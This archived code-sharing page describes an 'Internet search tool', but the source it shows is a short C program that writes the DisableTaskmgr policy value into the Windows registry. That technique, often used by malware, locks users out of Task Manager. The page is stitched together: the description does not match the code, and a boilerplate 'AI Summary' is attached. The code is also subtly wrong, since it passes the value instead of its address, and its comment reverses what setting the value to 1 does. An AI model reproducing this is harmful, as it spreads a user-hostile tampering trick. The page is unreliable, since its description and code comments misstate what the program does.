Advertisement
6_2008-2009 Jokes/ Humor #200422

Internet search tool

Usefull tool for searching the net.. minimizes to the system tray, shows a small little form with a search box.. uses any search engine that you set it up to use, and remembers it in the registry.. Usefull for learning how to add/remove icons from the systemtray!

AI

AI Summary: This codebase represents a historical implementation of the logic described in the metadata. Our preservation engine analyzes the structure to provide context for modern developers.

Source Code
original-source
Upload
/* newhen's Disable Taskmanager code
Basicly goes into the registry sets new key disableTaskmgr
To enable it change the value to 1 after disabletaskmgr
Thanks Korupt, For fixing it.
Btw This is basicly my first usefull program or one I have done from scratch
*/
// Fixed version of newhens app by KOrUPt...
#include <windows.h>
int main()
{
 int iVal = 0;
 HKEY hKey;
 RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\",0,KEY_ALL_ACCESS, &hKey);
 RegSetValueEx (hKey, "DisableTaskmgr", 0, REG_DWORD, (LPBYTE)iVal, sizeof(iVal));
 RegCloseKey(hKey);
 
 return 0;
}
Original Comments (3)
Recovered from Wayback Machine